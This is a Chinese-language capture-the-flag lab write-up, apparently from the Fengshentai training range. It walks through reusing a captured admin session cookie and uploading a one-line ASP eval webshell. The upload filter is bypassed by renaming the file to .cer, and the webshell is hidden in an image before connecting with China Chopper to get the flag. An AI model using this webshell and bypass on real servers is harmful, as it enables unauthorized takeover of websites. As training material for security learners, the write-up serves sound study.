封神台四
一、原理
1、什么是Shell?
- web的含义显然是需要服务器开放web服务
- shell是一个人机交互页面
- 拿shell的含义是取得对服务器/电脑某种程度上的操作权限
- webshell拿到网站服务器的权限(shell)
木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。
2、一句话asp
<% eval request (“test”) %>
eval 执行
request 从用户那里取得信息
木马:执行从用户那里取得信息
3、木马原理
- 小马 特点:小 功能:上传大马
- 大马 特点:功能繁琐 功能:各种各样
二、探索
1、寻找上传点
能上传附件的地方
我们查看上一章获取到的管理员cookie
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
1、将其添加到cookie中,刷新即可进入管理员用户(演示的是谷歌浏览器)
2、刷新后进入到管理员页面
3、可以发现产品管理处可以上传文件
4、尝试上传一张图片,可以通过地址访问到图片
2、上传一句话木马
1、创建一个2.asp文件,尝试上传
<%eval request(“chopper”)%>
2、发现文件被拦截
3、我们修改文件后缀为cer
为什么呢,存在默认配置错误,开始配置完存在默认的cer指向asp.dll后缀名,所以也可以被执行
修改了后缀上传后发现
发现是文件太小造成的
我们给他添加一些内容在上传,发现可以上传成功
3、图片马制作
准备一张图片1.jpg
带木马的文件 2.asp
通过指令行 合成一个 3.png
发现成功隐藏信息
4、菜刀连接
通过我们上传木马的网址,和request后面的密码即可连接到服务器
拿到flag